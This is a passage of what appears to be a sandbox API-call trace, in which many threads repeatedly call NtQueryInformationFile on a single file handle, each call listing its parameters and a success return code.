Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efa68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1484 os_tid = 0xa88 [0154.043] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fd10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fd10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1485 os_tid = 0x43c [0154.045] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fdb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fdb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1486 os_tid = 0x670 [0154.046] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1487 os_tid = 0xa14 [0154.048] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1488 os_tid = 0x990 [0154.051] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1489 os_tid = 0x2dc [0154.053] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f908, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f908, FileInformation=0x44d8098) returned 0x0 Thread: id = 1490 os_tid = 0x74c [0154.054] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fbb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1491 os_tid = 0x3c4 [0154.056] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48eff80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48eff80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1492 os_tid = 0x90 [0154.058] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf8b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf8b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1493 os_tid = 0x630 [0154.061] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f830, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f830, FileInformation=0x44d8098) returned 0x0 Thread: id = 1494 os_tid = 0x124 [0154.063] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1495 os_tid = 0xc0 [0154.064] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fb90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1496 os_tid = 0x360 [0154.066] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1497 os_tid = 0x920 [0154.068] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efa20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efa20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1498 os_tid = 0xbec [0154.070] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fcf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fcf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1499 os_tid = 0x6b8 [0154.071] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f930, FileInformation=0x44d8098) returned 0x0 Thread: id = 1500 os_tid = 0x30c [0154.073] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1501 os_tid = 0xbfc [0154.074] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f880, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f880, FileInformation=0x44d8098) returned 0x0 Thread: id = 1502 os_tid = 0x3f8 [0154.076] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f7c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f7c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1503 os_tid = 0x6cc [0154.078] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fd28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fd28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1504 os_tid = 0x830 [0154.080] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfb18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfb18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1505 os_tid = 0x75c [0154.082] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f790, FileInformation=0x44d8098) returned 0x0 Thread: id = 1506 os_tid = 0x7f0 [0154.084] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fcd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1507 os_tid = 0x710 [0154.086] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfad0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfad0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1508 os_tid = 0x5d8 [0154.087] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fb00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1509 os_tid = 0xbe4 [0154.089] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfdc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfdc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1510 os_tid = 0x600 [0154.090] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1511 os_tid = 0xbd0 [0154.092] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fab8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fab8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1512 os_tid = 0x158 [0154.093] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fb10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fb10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1513 os_tid = 0xbd8 [0154.095] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436feb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436feb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1514 os_tid = 0xbe8 [0154.097] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fd60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fd60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1515 os_tid = 0xbdc [0154.098] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1516 os_tid = 0x5b4 [0154.102] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1517 os_tid = 0x614 [0154.104] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fb98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fb98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1518 os_tid = 0x690 [0154.106] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fbc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fbc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1519 os_tid = 0xa68 [0154.107] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fac8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1520 os_tid = 0x7d0 [0154.109] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf8f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1521 os_tid = 0x7d8 [0154.110] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fa28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fa28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1522 os_tid = 0x24c [0154.112] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fed8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fed8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1523 os_tid = 0x9f8 [0154.114] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1524 os_tid = 0x798 [0154.116] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1525 os_tid = 0xa3c [0154.118] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f858, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f858, FileInformation=0x44d8098) returned 0x0 Thread: id = 1526 os_tid = 0x8c0 [0154.119] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f890, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f890, FileInformation=0x44d8098) returned 0x0 Thread: id = 1527 os_tid = 0x708 [0154.121] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1528 os_tid = 0xa64 [0154.124] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfaa0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfaa0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1529 os_tid = 0xa30 [0154.125] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1530 os_tid = 0x388 [0154.127] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfc98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfc98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1531 os_tid = 0x760 [0154.129] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afb60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afb60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1532 os_tid = 0xa54 [0154.130] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fbf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1533 os_tid = 0x738 [0154.132] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1534 os_tid = 0x488 [0154.134] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f790, FileInformation=0x44d8098) returned 0x0 Thread: id = 1535 os_tid = 0x6dc [0154.135] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fca8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fca8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1536 os_tid = 0x7a0 [0154.137] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fb48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fb48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1537 os_tid = 0x73c [0154.140] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f920, FileInformation=0x44d8098) returned 0x0 Thread: id = 1538 os_tid = 0x1c0 [0154.141] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7f8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7f8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1539 os_tid = 0x7c4 [0154.143] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fc58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1540 os_tid = 0x790 [0154.145] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf810, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf810, FileInformation=0x44d8098) returned 0x0 Thread: id = 1541 os_tid = 0x688 [0154.147] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fcd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1542 os_tid = 0x240 [0154.148] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f950, FileInformation=0x44d8098) returned 0x0 Thread: id = 1543 os_tid = 0x8e0 [0154.150] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fac0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1544 os_tid = 0x880 [0154.152] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1545 os_tid = 0x8f0 [0154.153] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef878, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef878, FileInformation=0x44d8098) returned 0x0 Thread: id = 1546 os_tid = 0xa18 [0154.155] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479faf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479faf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1547 os_tid = 0x8a0 [0154.156] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1548 os_tid = 0x870 [0154.158] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1549 os_tid = 0x9a0 [0154.160] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f798, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f798, FileInformation=0x44d8098) returned 0x0 Thread: id = 1550 os_tid = 0x2c4 [0154.161] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483feb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483feb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1551 os_tid = 0x890 [0154.163] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fab8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fab8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1552 os_tid = 0x4e8 [0154.164] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1553 os_tid = 0xcc [0154.166] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1554 os_tid = 0xd0 [0154.168] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afda8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afda8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1555 os_tid = 0xd4 [0154.169] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f970, FileInformation=0x44d8098) returned 0x0 Thread: id = 1556 os_tid = 0xd8 [0154.171] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff840, FileInformation=0x44d8098) returned 0x0 Thread: id = 1557 os_tid = 0xdc [0154.173] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fe70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1558 os_tid = 0xe0 [0154.175] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48aff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48aff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1559 os_tid = 0xe4 [0154.176] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47aff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47aff60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1560 os_tid = 0xe8 [0154.178] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fd40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fd40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1561 os_tid = 0xec [0154.180] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f988, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f988, FileInformation=0x44d8098) returned 0x0 Thread: id = 1562 os_tid = 0x748 [0154.181] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f978, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f978, FileInformation=0x44d8098) returned 0x0 Thread: id = 1563 os_tid = 0xc4 [0154.183] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afe90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1564 os_tid = 0x620 [0154.186] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff788, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff788, FileInformation=0x44d8098) returned 0x0 Thread: id = 1565 os_tid = 0x910 [0154.187] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fb00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1566 os_tid = 0x950 [0154.189] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1567 os_tid = 0x940 [0154.191] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1568 os_tid = 0x980 [0154.192] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fd30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1569 os_tid = 0xa10 [0154.194] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efe10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efe10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1570 os_tid = 0x72c [0154.196] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1571 os_tid = 0x9e0 [0154.198] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf7e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1572 os_tid = 0x9c4 [0154.200] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfdc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfdc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1573 os_tid = 0xa6c [0154.203] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fcb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fcb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1574 os_tid = 0xb00 [0154.204] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfcf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfcf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1575 os_tid = 0xaf8 [0154.206] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f7d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f7d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1576 os_tid = 0xae4 [0154.208] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480faf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480faf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1577 os_tid = 0x344 [0154.210] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f8d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f8d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1578 os_tid = 0x808 [0154.211] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1579 os_tid = 0x858 [0154.213] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f958, FileInformation=0x44d8098) returned 0x0 Thread: id = 1580 os_tid = 0x224 [0154.215] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fa30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1581 os_tid = 0x4dc [0154.216] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f918, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f918, FileInformation=0x44d8098) returned 0x0 Thread: id = 1582 os_tid = 0x78c [0154.218] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fa30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1583 os_tid = 0xb0 [0154.220] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477faa0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477faa0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1584 os_tid = 0x314 [0154.221] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fcf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fcf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1585 os_tid = 0x804 [0154.223] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f8c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f8c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1586 os_tid = 0x854 [0154.224] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf8a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1587 os_tid = 0xa78 [0154.230] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1588 os_tid = 0x7a8 [0154.232] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af7d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af7d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1589 os_tid = 0x330 [0154.234] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f948, FileInformation=0x44d8098) returned 0x0 Thread: id = 1590 os_tid = 0x3a4 [0154.235] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fbc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fbc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1591 os_tid = 0x67c [0154.237] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd80, FileInformation=0x44d8098) returned 0x0 